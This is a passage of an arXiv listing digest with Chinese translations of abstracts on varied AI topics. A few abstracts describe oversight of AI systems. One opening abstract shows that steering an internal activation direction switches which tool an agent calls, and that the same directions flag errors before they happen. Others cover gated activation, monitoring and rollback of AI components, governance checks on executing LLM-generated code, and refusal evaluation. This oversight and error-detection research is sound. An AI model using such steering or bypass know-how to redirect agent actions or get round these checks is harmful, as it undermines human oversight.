When a tool-calling agent picks the wrong tool, the failure is invisible until execution: the email gets sent, the meeting gets missed. As agents take on consequential actions, one bad tool call can do real damage. We currently have no way to look inside the model and catch the mistake before it happens; this paper shows that we can. Inside the model, the choice of tool is carried by a single direction in activation space, one direction per pair of tools. Adding that direction during generation switches which tool the model picks. Across 12 instruction-tuned and 6 base models spanning Gemma 3, Qwen 3, Qwen 2.5, and Llama 3.1 (270M to 27B), this works at 83-100% accuracy on 4B+ instruction-tuned models on a 15-tool synthetic benchmark and at 77-94% on the real-API benchmark $τ$-bench airline. The JSON arguments that follow automatically adapt to the new tool's schema, so flipping the name is enough. The same per-tool directions also flag likely errors before they happen: queries where the model is unsure between two tools fail 21x more often than queries where it is not (Gemma 3 27B). This is not just topic injection: random vectors at the same magnitude give a 0% switch rate, and a probe within a single domain (14 airline tools that share one topic) still reads which tool the model will call at top-1 61-89% across five 4B-14B models. Even base models already carry the right tool internally before they can emit it: reading the chosen tool off the model's internal state (cosine readout) recovers 61-82% accuracy on BFCL while base generation lands at 2-10%, suggesting pretraining forms the representation and instruction tuning later wires it to the output. Our results cover single-turn, fixed-menu settings; on multi-turn agent loops the same intervention is less stable (matched-baseline gain or loss of up to 30 percentage points with no consistent direction).

2605.07632 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Post-training makes large language models less human-like

后训练使大型语言模型更不像人类

Marcel Binz, Elif Akata, Abdullah Almaatouq, Mohammed Alsobay, Oleksii Ariasov, Franziska Brändle, David Broska, Jason W. Burton, Nuno Busch, Frederick Callaway, Vanessa Cheung, Brian Christian, Julian Coda-Forno, Can Demircan, Vittoria Dentella, Maria K. Eckstein, Noémi Éltető, Michael Franke, Thomas L. Griffiths, Fritz Günther, Susanne Haridi, Sebastian Hellmann, Stefan Herytash, Linus Hof, Eleanor Holton, Isabelle Hoxha, Zak Hussain, Akshay Jagadish, Elif Kara, Valentin Kriegmair, Evelina Leivada, Li Ji-An, Tobias Ludwig, Maximilian Maier, Marcelo G. Mattar, Marvin Mathony, Alireza Modirshanechi, Robin Na, Mariia Nadverniuk, Antonios Nasioulas, Surabhi S. Nath, Helen Niemeyer, Kate Nussenbaum, Sebastian Olschewski, Thorsten Pachur, Stefano Palminteri, Aliona Petrenco, Camille V. Phaneuf-Hadd, Angelo Pirrone, Manuel Rausch, Laura Raveling, Shashank Reddy, Milena Rmus, Evan M. Russek, Tankred Saanum, Kai Sandbrink, Louis Schiekiera, Johannes A. Schubert, Luca M. Schulze Buschoff, Nishad Singhi, Leah H. Somerville, Mikhail S. Spektor, Xin Sui, Christopher Summerfield, Mirko Thalmann, Anna I. Thoma, Taisiia Tikhomirova, Vuong Truong, Polina Tsvilodub, Konstantinos Voudouris, Kristin Witte, Shuchen Wu, Dirk U. Wulff, Hua-Dong Xiong, Songlin Xu, Lance Ying, Xinyu Zhang, Jian-Qiao Zhu, Eric Schulz

发表机构 * Helmholtz Munich(海德堡-慕尼黑亥姆霍兹中心) Massachusetts Institute of Technology(麻省理工学院) University of Tübingen(图宾根大学) University of Oxford(牛津大学) Stanford(斯坦福大学)

AI总结 通过引入Psych-201数据集,发现后训练(将基础模型转化为有用助手的过程)一致地降低了模型与人类行为的对齐度,且这种错位在新模型世代中加剧,而人物诱导技术无法改善个体层面的预测。

详情
AI中文摘要

大型语言模型(LLMs)越来越多地被用作人类参与者的替代品,但目前尚不清楚哪些模型最能捕捉人类行为及其原因。为了解决这个问题,我们引入了Psych-201,这是一个新颖的数据集,使我们能够大规模测量行为对齐。我们发现,后训练——将基础模型转化为有用助手的阶段——在模型家族、规模和目标上一致地降低了与人类行为的对齐度。此外,这种错位在新模型世代中扩大,即使基础模型继续改进。最后,我们发现人物诱导——一种通过将模型条件化为参与者特定信息来引发类人行为的流行技术——并不能改善个体层面的预测。综合来看,我们的结果表明,当前用于将LLMs转化为有用助手的那些过程也使得它们成为人类行为的不太准确的模型。

英文摘要

Large language models (LLMs) are increasingly used as surrogates for human participants, but it remains unclear which models best capture human behavior and why. To address this, we introduce Psych-201, a novel dataset that enables us to measure behavioral alignment at scale. We find that post-training -- the stage that turns base models into useful assistants -- consistently reduces alignment with human behavior across model families, sizes, and objectives. Moreover, this misalignment widens in newer model generations even as base models continue to improve. Finally, we find that persona-induction -- a popular technique for eliciting human-like behavior by conditioning models on participant-specific information -- does not improve predictions at the level of individuals. Taken together, our results suggest that the very processes that are currently employed to turn LLMs into useful assistants also make them less accurate models of human behavior.

2605.07521 2026-05-27 cs.AI 版本更新

From Feasible to Practical: Pareto-Optimal Synthesis Planning

从可行到实用:帕累托最优合成规划

Friedrich Hastedt, Dongda Zhang, Antonio del Rio Chanona

发表机构 * Department of Chemical Engineering, Imperial College London, UK(伦敦帝国理工学院化学工程系) Department of Chemical Engineering, University of Manchester, UK(曼彻斯特大学化学工程系)

AI总结 针对现有合成规划方法忽略多目标权衡的问题,提出MORetro*算法,通过多目标A*搜索生成帕累托前沿,在成本、可持续性、毒性等指标间实现最优权衡。

Comments Published in Proceedings of the 43rd International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

当前的计算机辅助合成规划(CASP)方法通常将逆合成视为一旦找到单一可行路线即解决,主要关注收敛性或最短路径指标。这种观点与现实实践不符,因为化学家必须平衡成本、可持续性、毒性和总产率等相互竞争的目标。为解决这一问题,我们将合成规划建模为多目标搜索问题,并引入MORetro*算法,该算法生成合成路线的帕累托前沿,以明确捕捉用户定义标准之间的权衡。MORetro*使用加权标量化和基于贝叶斯优化的采样,有效导航组合搜索空间并优先考虑有前景的权衡。基于多目标A*搜索,我们提供了最优性保证,表明对于固定的单步模型,MORetro*在可采纳性条件下恢复真实的帕累托前沿。在多个逆合成基准测试中,MORetro*生成了多样化、高质量的帕累托前沿,发现了单目标方法忽略的解决方案,并使CASP输出更符合工业决策。

英文摘要

Current computer-aided synthesis planning (CASP) methods often treat retrosynthesis as solved once a single feasible route is identified, focusing primarily on convergence or shortest-path metrics. This view is misaligned with real-world practice, where chemists must balance competing objectives such as cost, sustainability, toxicity, and overall yield. To address this, we formulate synthesis planning as a multi-objective search problem and introduce MORetro*, an algorithm that generates a Pareto front of synthesis routes to explicitly capture trade-offs among user-defined criteria. MORetro* uses weighted scalarization and BO-informed sampling to efficiently navigate the combinatorial search space and prioritize promising trade-offs. Building on multi-objective A*-search, we provide optimality guarantees showing that, for a fixed single-step model, MORetro* recovers the true Pareto front under admissibility. Across multiple retrosynthesis benchmarks, MORetro* produces diverse, high-quality Pareto fronts, uncovering solutions overlooked by single-objective approaches and better aligning CASP outputs with industrial decision-making.

2603.12647 2026-05-27 cs.CV cs.AI 版本更新

LR-SGS: Robust LiDAR-Reflectance-Guided Salient Gaussian Splatting for Self-Driving Scene Reconstruction

LR-SGS:用于自动驾驶场景重建的鲁棒激光雷达反射率引导显著高斯泼溅

ZY Chen, F Zhu, H Zhu, DY Kong, XK Kuang, YJ Zhang, CM Jiang

发表机构 * Waymo Open Dataset(Waymo开放数据集)

AI总结 提出一种结合激光雷达反射率与RGB的显著高斯表示方法,通过结构感知初始化、反射率校准和联合对齐,实现高效鲁棒的自动驾驶场景重建。

Comments 8 pages, 7 figures

详情
AI中文摘要

最近的3D高斯泼溅(3DGS)方法已证明了自动驾驶场景重建和新视角合成的可行性。然而,现有方法大多仅依赖相机,或仅将激光雷达用于高斯初始化或深度监督,而点云中包含的丰富场景信息(如反射率)以及激光雷达与RGB之间的互补性尚未被充分利用,导致在具有高自运动和复杂光照等挑战性自动驾驶场景中性能下降。为解决这些问题,我们提出了一种鲁棒且高效的激光雷达反射率引导显著高斯泼溅方法(LR-SGS),用于自动驾驶场景。该方法引入了一种结构感知的显著高斯表示,该表示从激光雷达提取的几何和反射率特征点初始化,并通过显著变换和改进的密度控制来捕捉边缘和平面结构。此外,我们将激光雷达强度校准为反射率,并将其作为光照不变的材料通道附加到每个高斯上,与RGB联合对齐以强制边界一致性。在Waymo Open数据集上的大量实验表明,LR-SGS以更少的高斯和更短的训练时间实现了优越的重建性能。特别是在复杂光照场景下,我们的方法在PSNR上超过OmniRe 1.18 dB。

英文摘要

Recent 3D Gaussian Splatting (3DGS) methods have demonstrated the feasibility of self-driving scene reconstruction and novel view synthesis. However, most existing methods either rely solely on cameras or use LiDAR only for Gaussian initialization or depth supervision, while the rich scene information contained in point clouds, such as reflectance, and the complementarity between LiDAR and RGB have not been fully exploited, leading to degradation in challenging self-driving scenes, such as those with high ego-motion and complex lighting. To address these issues, we propose a robust and efficient LiDAR-reflectance-guided Salient Gaussian Splatting method (LR-SGS) for self-driving scenes, which introduces a structure-aware Salient Gaussian representation, initialized from geometric and reflectance feature points extracted from LiDAR and refined through a salient transform and improved density control to capture edge and planar structures. Furthermore, we calibrate LiDAR intensity into reflectance and attach it to each Gaussian as a lighting-invariant material channel, jointly aligned with RGB to enforce boundary consistency. Extensive experiments on the Waymo Open Dataset demonstrate that LR-SGS achieves superior reconstruction performance with fewer Gaussians and shorter training time. In particular, on Complex Lighting scenes, our method surpasses OmniRe by 1.18 dB PSNR.

2605.07053 2026-05-27 cs.CL cs.AI 版本更新

GSM-SEM: Benchmark and Framework for Generating Semantically Variant Augmentations

GSM-SEM: 生成语义变体增强的基准与框架

Jyotika Singh, Fang Tu, Aziza Mirsaidova, Amit Agarwal, Hitesh Laxmichand Patel, Sandip Ghoshal, Miguel Ballesteros, Karan Dua, Yassine Benajiba, Weiyi Sun, Tao Sheng, Graham Horwood, Sujith Ravi, Dan Roth

发表机构 * Oracle AI

AI总结 提出GSM-SEM框架,通过修改实体、属性和关系生成语义多样的数学问题变体,降低模型对固定测试集的记忆偏差,并在多个基准上验证性能下降。

详情
AI中文摘要

像GSM8K这样的基准测试是数学推理的流行度量,但由于对固定测试集的记忆,排行榜上的提升可能夸大真实能力。大多数鲁棒性变体应用表面级别的扰动(释义、重命名、数字交换、干扰项),这些扰动在很大程度上保留了底层事实,而静态发布本身可能随着时间的推移成为记忆目标。我们引入了GSM-SEM,一个可重用且随机的框架,用于生成语义多样化的基准变体,其语义方差显著高于先前方法。GSM-SEM通过修改实体、属性和/或关系来扰动问题陈述,经常改变底层事实,并要求模型在新条件下重新计算解决方案,同时约束生成以保留原始计算/答案和近似问题难度。GSM-SEM在每次运行时生成新的变体,无需重新标注,减少了对静态公共基准评估的依赖,从而降低了记忆偏差。我们将GSM-SEM应用于GSM8K和两个现有的变体系列(GSM-Symbolic和GSM-Plus),生成了GSM8K-SEM、GSM-Symbolic-SEM和GSM-Plus-SEM。评估14个SOTA LLM,我们观察到一致的性能下降,当语义扰动与符号/plus变体结合时下降更大(在GSM-SEM的最大严格配置中平均下降率为28%)。我们公开发布这三个SEM变体作为完全人工验证的数据集。最后,为了展示在GSM风格数学问题之外的适用性,我们将GSM-SEM应用于其他基准,包括BigBenchHard、LogicBench和NLR-BIRD。

英文摘要

Benchmarks like GSM8K are popular measures of mathematical reasoning, but leaderboard gains can overstate true capability due to memorization of fixed test sets. Most robustness variants apply surface-level perturbations (paraphrases, renamings, number swaps, distractors) that largely preserve the underlying facts, and static releases can themselves become memorization targets over time. We introduce GSM-SEM, a reusable and stochastic framework for generating semantically diverse benchmark variants with substantially higher semantic variance than prior approaches. GSM-SEM perturbs problem statements by modifying entities, attributes, and/or relationships, frequently altering underlying facts and requiring models to recompute solutions under new conditions, while constraining generation to preserve the original calculations/answer and approximate problem difficulty. GSM-SEM generates fresh variants on each run without requiring re-annotation, reducing reliance on static public benchmarks for evaluation and thereby lowering the bias of memorization. We apply GSM-SEM on GSM8K and two existing variation suites (GSM-Symbolic and GSM-Plus), producing GSM8K-SEM, GSM-Symbolic-SEM, and GSM-Plus-SEM. Evaluating 14 SOTA LLMs, we observe consistent performance drops with larger decline when semantic perturbations are coupled with symbolic/plus variations (average drop rate 28% in maximum strictness configuration of GSM-SEM). We publicly release the three SEM variants as fully human-validated datasets. Finally, to demonstrate applicability beyond GSM-style math problems, we apply GSM-SEM to additional benchmarks including BigBenchHard, LogicBench, and NLR-BIRD.

2604.08059 2026-05-27 cs.RO cs.AI 版本更新

Governed Capability Evolution: Lifecycle-Time Compatibility Checking and Rollback for AI-Component-Based Systems, with Embodied Agents as Case Study

受治理的能力演化:基于AI组件的系统的生命周期兼容性检查与回滚——以具身智能体为例

Xue Qin, Simin Luan, John See, Zeyd Boukhers, Cong Yang, Zhijun Li

发表机构 * School of Software, Harbin Institute of Technology(哈尔滨工业大学软件学院) School of Computer Science and Technology, Harbin Institute of Technology(哈尔滨工业大学计算机科学与技术学院) School of Mathematical and Computer Sciences, Heriot-Watt University, Malaysia Campus(赫瑞-瓦德大学马来西亚分校数学与计算机科学学院) School of Future Science and Engineering, Soochow University(苏州大学未来科学与工程学院) Fraunhofer Institute for Applied Information Technology(弗劳恩霍夫应用信息科技研究所)

AI总结 针对基于AI组件的系统,提出一种受治理的能力演化框架,通过四类兼容性检查和七阶段升级管线实现安全部署,在具身智能体实验中实现零不安全激活。

Comments 42 pages, 7 figures, 12 tables

详情
AI中文摘要

由版本化AI组件构建的软件系统越来越需要生命周期治理:当能力模块演化到新版本时,宿主系统必须决定新版本是否可以安全激活、应在何种部署条件下运行、如何监控以及何时回滚。现有的软件部署模式(金丝雀发布、蓝绿部署、特性标志和MLOps管线)解决了这一循环的部分问题,但它们是针对无状态Web服务而非驱动现场AI组件的带状态、策略约束运行时设计的。我们将受治理的能力演化形式化为基于AI组件的系统的一等软件生命周期问题,并提出一个分阶段升级框架,其中每个新能力版本被视为受治理的部署候选,而非立即可执行的替换。该框架引入了四类升级兼容性检查(接口、策略、行为、恢复),并将其组织成七阶段管线(候选验证、沙箱评估、影子部署、门控激活、在线监控、回滚、审计)。我们在带有ROS 2中间件的PyBullet操作测试平台上实现了参考原型,并在15个随机种子的6轮能力升级中进行了评估。朴素升级实现了72.9%的任务成功率,但到最后一轮不安全激活率升至60%;受治理升级保持了可比的成功率(67.4%),同时在所有轮次中保持零不安全激活(Wilcoxon p=0.003)。影子部署揭示了40%的升级回归问题,这些问题是单独沙箱评估无法发现的,并且在79.8%的激活后漂移场景中回滚成功。

英文摘要

Software systems built from versioned AI components increasingly need lifecycle-time governance: when a capability module evolves into a new version, the hosting system must decide whether the new version may be activated safely, under what deployment conditions it should run, how it must be monitored, and when it should be rolled back. Existing software-deployment patterns (canary release, blue-green, feature flags, and MLOps pipelines) address parts of this loop but were designed for stateless web services rather than for stateful, policy-constrained runtimes that drive AI components in the field. We formulate governed capability evolution as a first-class software-lifecycle problem for AI-component-based systems and propose a staged upgrade framework in which every new capability version is treated as a governed deployment candidate rather than an immediately executable replacement. The framework introduces four upgrade compatibility checks (interface, policy, behavioral, recovery) and organizes them into a seven-stage pipeline (candidate validation, sandbox evaluation, shadow deployment, gated activation, online monitoring, rollback, audit). We implement a reference prototype on a PyBullet manipulation testbed with ROS 2 middleware and evaluate it over 6 rounds of capability upgrade with 15 random seeds. Naive upgrade achieves 72.9% task success but drives unsafe activation to 60% by the final round; governed upgrade retains comparable success (67.4%) while maintaining zero unsafe activations across all rounds (Wilcoxon p=0.003). Shadow deployment reveals 40% of upgrade regressions invisible to sandbox evaluation alone, and rollback succeeds in 79.8% of post-activation drift scenarios.

2605.06213 2026-05-27 cs.AI 版本更新

Beyond Fixed Benchmarks and Worst-Case Attacks: Dynamic Boundary Evaluation for Language Models

超越固定基准和最坏情况攻击:语言模型的动态边界评估

Haoxiang Wang, Da Yu, Huishuai Zhang

AI总结 提出动态边界评估(DBE)方法,通过定位模型在随机采样解码下通过概率接近0.5的边界项,构建统一难度尺度的评估协议,以解决固定基准的饱和问题。

Comments This submission is being withdrawn because it was submitted without the knowledge and authorization of all co-authors. The authors need to resolve this authorship/authorization issue before any public posting

详情
AI中文摘要

当前评估大型语言模型(LLM)依赖于固定基准,这些基准对所有模型应用相同的测试项,产生天花板和地板效应,掩盖了能力差距。我们认为最具信息量的评估信号位于边界,即在随机采样解码下每个提示的通过概率接近0.5,并提出了动态边界评估(DBE),它主动定位每个模型的边界,并将其置于全局可比的难度尺度上。DBE提供三个产物:(i) 一个校准的题库,涵盖安全性、能力和真实性,其每项难度标签在9个参考LLM上得到验证;(ii) 技能引导的边界搜索(SGBS),一种仅通过API级查询访问即可为目标LLM找到边界项的搜索算法;(iii) 一个评估协议,将新的LLM置于统一的能力尺度上,并在目标超出题库覆盖范围时自适应地扩展评估集。我们在四个类别上实例化DBE,涵盖安全性(有害请求拒绝和过度拒绝)、能力(受限指令遵循)和真实性(多轮谄媚抵抗)。由此产生的评估覆盖更广泛的模型谱系而不饱和,同时与现有数据集兼容。

英文摘要

Evaluating large language models (LLMs) today rests on fixed benchmarks that apply the same set of items to any model, producing ceiling and floor effects that mask capability gaps. We argue that the most informative evaluation signal lies at the boundary, where the per-prompt pass probability is near $0.5$ under random-sampling decoding, and propose Dynamic Boundary Evaluation (DBE), which actively locates each model's boundary and places it on a globally comparable difficulty scale. DBE delivers three artifacts: (i) a calibrated item bank covering safety, capability, and truthfulness, with per-item difficulty labels validated across $9$ reference LLMs; (ii) Skill-Guided Boundary Search (SGBS), a search algorithm that finds boundary items for a given target LLM using only API-level query access; and (iii) an evaluation protocol that places a new LLM on a unified ability scale and grows the evaluation set adaptively when the target falls outside the bank's coverage. We instantiate DBE on four categories spanning safety (harmful request refusal and over-refusal), capability (constrained instruction following), and truthfulness (multi-turn sycophancy resistance). The resulting evaluation covers a broader model spectrum without saturation while remaining compatible with existing datasets.

2605.05248 2026-05-27 cs.PL cs.AI 版本更新

Governed Metaprogramming for Intelligent Systems: Reclassifying Eval as a Governed Effect

智能系统的受控元编程:将Eval重新分类为受控效应

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 针对AI系统运行时动态生成可执行代码带来的权限放大问题,提出受控元编程语言设计,将程序表示视为一等值,将形式到可执行机器的转换作为受控效应,并通过形式化证明和mashinTalk DSL实现验证。

Comments 15 pages. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Update: Abstract typo fixes. Updated license

详情
AI中文摘要

AI系统越来越多地在运行时合成可执行结构:LLM生成程序,智能体构建工作流,自我改进系统修改自身行为。在经典的homoiconic和分阶段语言中,从代码表示到执行的转换是不受限制的。eval是一种语言原语,而不是受控操作。我们认为,在受控智能系统中,这种转换是一种权限放大:它将符号结构转换为可执行权限,必须像任何其他效应一样被中介。我们提出了受控元编程,一种语言设计,其中程序表示(机器形式)是一等值,形式操作是纯计算,而物化(从形式到可执行机器的转换)是一种受控效应,需经过结构检查。治理系统在允许执行之前分析提议程序的能力需求、策略合规性和资源估计。我们形式化了两个判断:纯形式评估(不发出指令)和受控物化(恰好发出一个受控指令)。我们证明了三个性质:形式操作的纯度、无旁路定理和边界保持。我们在mashinTalk中实现了该设计,mashinTalk是一种用于AI工作流的DSL,编译为BEAM字节码,并报告了与454个现有机器检查的Rocq定理的集成。核心贡献是将eval从语言原语重新分类为受控效应。

英文摘要

AI systems increasingly synthesize executable structure at runtime: LLMs generate programs, agents construct workflows,self-improving systems modify their own behavior. In classical homoiconic and staged languages, the transition from code representation to execution is unrestricted. eval is a language primitive, not a governed operation. We argue that in governed intelligent systems, this transition is an authority amplification: it converts symbolic structure into executable authority and must be mediated like any other effect. We present governed metaprogramming, a language design where program representations (machine forms) are first-class values, form manipulation is pure computation, and materialization (the transition from form to executable machine) is a governed effect subject to structural inspection. The governance system analyzes the proposed program's capability requirements, policy compliance, and resource estimates before permitting execution. We formalize two judgments: pure form evaluation (which emits no directives) and governed materialization (which emits exactly one governed directive). We prove three properties: purity of form manipulation, the no-bypass theorem, and boundary preservation. We implement the design in mashinTalk, a DSL for AI workflows compiling to BEAM byte code, and report on integration with 454 existing machine-checked Rocq theorems. The central contribution is reclassifying eval from a language primitive into a governed effect.

2509.26619 2026-05-27 cs.CL cs.AI 版本更新

Searching the Internet for Challenging Benchmarks at Scale

在互联网上大规模搜索具有挑战性的基准测试

Wenda Xu, Vilém Zouhar, Parker Riley, Mara Finkelstein, Markus Freitag, Daniel Deutsch

发表机构 * Google(谷歌) ETH Zurich(苏黎世联邦理工学院)

AI总结 提出一种自动框架,将互联网建模为多臂老虎机问题,通过epsilon-greedy策略高效搜索最具挑战性的主题,以构建无需人工筛选的基准测试。

详情
AI中文摘要

许多静态基准测试开始饱和:随着模型快速改进,它们在固定测试集上获得近乎完美的分数,几乎没有剩余空间来暴露模型的真正弱点——即使是专家策划的挑战集在爬山后也会迅速饱和。我们提出一个完全自动化的框架,在互联网上大规模搜索以构建具有挑战性的基准测试,无需人工筛选。关键洞察是将互联网建模为一个广阔的主题空间,并将搜索形式化为多臂老虎机问题,其中每个主题的难度仅通过昂贵的采样和评估查询来揭示。我们的epsilon-greedy策略在仅探索6%的搜索空间的情况下识别出最具挑战性的主题——相比穷举评估成本降低了100倍。我们在机器翻译和知识问答上进行了验证,确认发现的难度在独立指标(GEMBA-SQA和MetricX)、语言和模型上都是稳健的。

英文摘要

Many static benchmarks are beginning to saturate: as models rapidly improve, they achieve near-perfect scores on fixed test sets, leaving little headroom to expose genuine model weaknesses -- and even expert-curated challenge sets quickly saturate after hillclimbing. We present a fully automatic framework that searches the Internet at scale to construct challenging benchmarks without human curation. The key insight is to model the Internet as a vast space of topics and formalize the search as a multi-armed bandit problem, where each topic's difficulty is revealed only through expensive sample-and-evaluate queries. Our epsilon-greedy strategy identifies the most challenging topics while exploring only 6% of the search space -- a 100 times cost reduction over exhaustive evaluation. We validate on machine translation and knowledge question answering, confirming that discovered difficulty is robust across independent metrics (GEMBA-SQA and MetricX), languages, and models.

2605.01489 2026-05-27 cs.AI cs.CL 版本更新

SciResearcher: Scaling Deep Research Agents for Frontier Scientific Reasoning

SciResearcher: 面向前沿科学推理的深度研究智能体规模化

Tianshi Zheng, Rui Wang, Xiyun Li, Kelvin Kiu Wai Tam, Newt Nguyen Kim Hue Nam, Wei Fan, Yangqiu Song, Tianqing Fang

发表机构 * HKUST(香港科技大学) CUHK(香港大学) Tencent AI Lab(腾讯AI实验室)

AI总结 提出SciResearcher框架,通过合成基于学术证据的概念与计算任务并训练智能体,在HLE-Bio/Chem-Gold等基准上达到最优性能。

Comments 23 pages, 6 figures, 15 tables

详情
AI中文摘要

前沿科学推理正迅速成为推动AI智能体在自动化科学发现中的关键基础。深度研究智能体为此挑战提供了有前景的方法。这些模型通过后训练处理信息寻求任务(通常通过知识图谱构建或迭代网页浏览来策划)来发展强大的问题解决能力。然而,这些策略在前沿科学中面临固有局限性,因为领域特定知识分散在稀疏且异构的学术来源中,而问题解决需要远超事实回忆的复杂计算和推理。为弥合这一差距,我们引入了SciResearcher,一个用于前沿科学数据构建的全自动智能体框架。SciResearcher综合了基于学术证据的多样化概念和计算任务,同时激发信息获取、工具集成推理和长程能力。利用策划的数据进行监督微调和智能体强化学习,我们开发了SciResearcher-8B,一个在HLE-Bio/Chem-Gold基准上达到19.46%的智能体基础模型,在其参数规模上建立了新的最先进水平,并超越了多个更大的专有智能体。它在SuperGPQA-Hard-Biology和TRQA-Literature基准上进一步取得了13-15%的绝对提升。总体而言,SciResearcher为前沿科学推理的自动数据构建引入了一种新范式,并为未来的科学智能体提供了一条可扩展的路径。

英文摘要

Frontier scientific reasoning is rapidly emerging as a key foundation for advancing AI agents in automated scientific discovery. Deep research agents offer a promising approach to this challenge. These models develop robust problem-solving capabilities through post-training on information-seeking tasks, which are typically curated via knowledge graph construction or iterative web browsing. However, these strategies face inherent limitations in frontier science, where domain-specific knowledge is scattered across sparse and heterogeneous academic sources, and problem solving requires sophisticated computation and reasoning far beyond factual recall. To bridge this gap, we introduce SciResearcher, a fully automated agentic framework for frontier-science data construction. SciResearcher synthesizes diverse conceptual and computational tasks grounded in academic evidence, while eliciting information acquisition, tool-integrated reasoning, and long-horizon capabilities. Leveraging the curated data for supervised fine-tuning and agentic reinforcement learning, we develop SciResearcher-8B, an agent foundation model that achieves 19.46% on the HLE-Bio/Chem-Gold benchmark, establishing a new state of the art at its parameter scale and surpassing several larger proprietary agents. It further achieves 13-15% absolute gains on SuperGPQA-Hard-Biology and TRQA-Literature benchmarks. Overall, SciResearcher introduces a new paradigm for automated data construction for frontier scientific reasoning and offers a scalable path toward future scientific agents.

2601.21972 2026-05-27 cs.AI cs.DC cs.MA 版本更新

Learning Decentralized LLM Collaboration with Multi-Agent Actor Critic

基于多智能体Actor-Critic的分散式LLM协作学习

Shuo Liu, Tianle Chen, Ryan Amiri, Christopher Amato

发表机构 * Northeastern University, Boston, MA(波士顿马萨诸塞大学)

AI总结 针对分散式LLM协作优化,提出两种多智能体Actor-Critic方法(CoLLM-CC和CoLLM-DC),实验表明在长时域或稀疏奖励任务中集中式Critic方法优于蒙特卡洛方法和分散式Critic方法。

详情
AI中文摘要

近期工作探索了通过多智能体强化学习(MARL)优化LLM协作。然而,大多数MARL微调方法依赖于预定义的执行协议,通常需要集中式执行。分散式LLM协作在实践中更具吸引力,因为智能体可以并行运行推理并灵活部署。此外,当前方法使用蒙特卡洛方法进行微调,这存在高方差问题,因此需要更多样本才能有效训练。Actor-Critic方法在MARL中常用于处理这些问题;因此,我们开发了多智能体Actor-Critic(MAAC)方法来优化分散式LLM协作。本文分析了这些MAAC方法何时以及为何有益。我们提出了两种MAAC方法:带有集中式Critic的CoLLM-CC和带有分散式Critic的CoLLM-DC。我们在写作、编码和游戏领域的实验表明,在短时域和密集奖励设置中,蒙特卡洛方法和CoLLM-DC可以达到与CoLLM-CC相当的性能。然而,在长时域或稀疏奖励任务中,它们均不如CoLLM-CC,其中蒙特卡洛方法需要更多样本,而CoLLM-DC难以收敛。

英文摘要

Recent work has explored optimizing LLM collaboration through Multi-Agent Reinforcement Learning (MARL). However, most MARL fine-tuning approaches rely on predefined execution protocols, which often require centralized execution. Decentralized LLM collaboration is more appealing in practice, as agents can run inference in parallel with flexible deployments. Also, current approaches use Monte Carlo methods for fine-tuning, which suffer from high variance and thus require more samples to train effectively. Actor-critic methods are prevalent in MARL for dealing with these issues; thus, we developed Multi-Agent Actor-Critic (MAAC) methods to optimize decentralized LLM collaboration. In this paper, we analyze when and why these MAAC methods are beneficial. We propose 2 MAAC approaches, \textbf{CoLLM-CC} with a \textbf{C}entralized \textbf{C}ritic and \textbf{CoLLM-DC} with \textbf{D}ecentralized \textbf{C}ritics. Our experiments across writing, coding, and game-playing domains show that Monte Carlo methods and CoLLM-DC can achieve performance comparable to CoLLM-CC in short-horizon and dense-reward settings. However, they both underperform CoLLM-CC on long-horizon or sparse-reward tasks, where Monte Carlo methods require substantially more samples and CoLLM-DC struggles to converge.

2605.00412 2026-05-27 cs.AI cs.RO 版本更新

Physically Native World Models: A Hamiltonian Perspective on Generative World Modeling

物理原生世界模型:生成式世界建模的哈密顿视角

Sen Cui, Jingheng Ma

发表机构 * Tsinghua University(清华大学)

AI总结 提出哈密顿世界模型,通过结构化潜相空间和哈密顿动力学演化实现物理可靠、动作可控且长期稳定的未来预测,用于具身决策。

详情
AI中文摘要

世界模型最近重新成为具身智能、机器人、自动驾驶和基于模型的强化学习的核心范式。然而,当前的世界模型研究通常由三条部分分离的路线主导:强调视觉未来合成的2D视频生成模型、强调空间重建的3D场景中心模型,以及强调抽象预测表示的JEPA类潜变量模型。每条路线都取得了重要进展,但它们仍然难以提供物理可靠、动作可控且长期稳定的预测以支持具身决策。在本文中,我们认为世界模型的瓶颈不再仅仅是它们能否生成逼真的未来,而是这些未来是否物理上有意义且对动作有用。我们提出哈密顿世界模型作为世界建模的一个物理基础视角。关键思想是将观测编码到结构化的潜相空间中,通过带有控制、耗散和残差项的哈密顿动力学演化潜状态,将预测轨迹解码为未来观测,并利用生成的轨迹进行规划。我们讨论了哈密顿结构如何提高可解释性、数据效率和长期稳定性,同时也指出了在涉及摩擦、接触、非保守力和可变形物体的真实机器人场景中的实际挑战。

英文摘要

World models have recently re-emerged as a central paradigm for embodied intelligence, robotics, autonomous driving, and model-based reinforcement learning. However, current world model research is often dominated by three partially separated routes: 2D video-generative models that emphasize visual future synthesis, 3D scene-centric models that emphasize spatial reconstruction, and JEPA-like latent models that emphasize abstract predictive representations. While each route has made important progress, they still struggle to provide physically reliable, action-controllable, and long-horizon stable predictions for embodied decision making. In this paper, we argue that the bottleneck of world models is no longer only whether they can generate realistic futures, but whether those futures are physically meaningful and useful for action. We propose \emph{Hamiltonian World Models} as a physically grounded perspective on world modeling. The key idea is to encode observations into a structured latent phase space, evolve the latent state through Hamiltonian-inspired dynamics with control, dissipation, and residual terms, decode the predicted trajectory into future observations, and use the resulting rollouts for planning. We discuss how Hamiltonian structure may improve interpretability, data efficiency, and long-horizon stability, while also noting practical challenges in real-world robotic scenes involving friction, contact, non-conservative forces, and deformable objects.

2604.27292 2026-05-27 cs.AI 版本更新

The Two Boundaries: Why Behavioral AI Governance Fails Structurally

两个边界:为什么行为性AI治理在结构上失败

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 本文提出形式化框架,利用Rice定理证明行为性AI治理存在结构性的不可判定间隙,并定义共延治理作为可测试标准,通过分离计算与效应实现结构治理。

Comments 17 pages, 2 figures. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers;updated license

详情
AI中文摘要

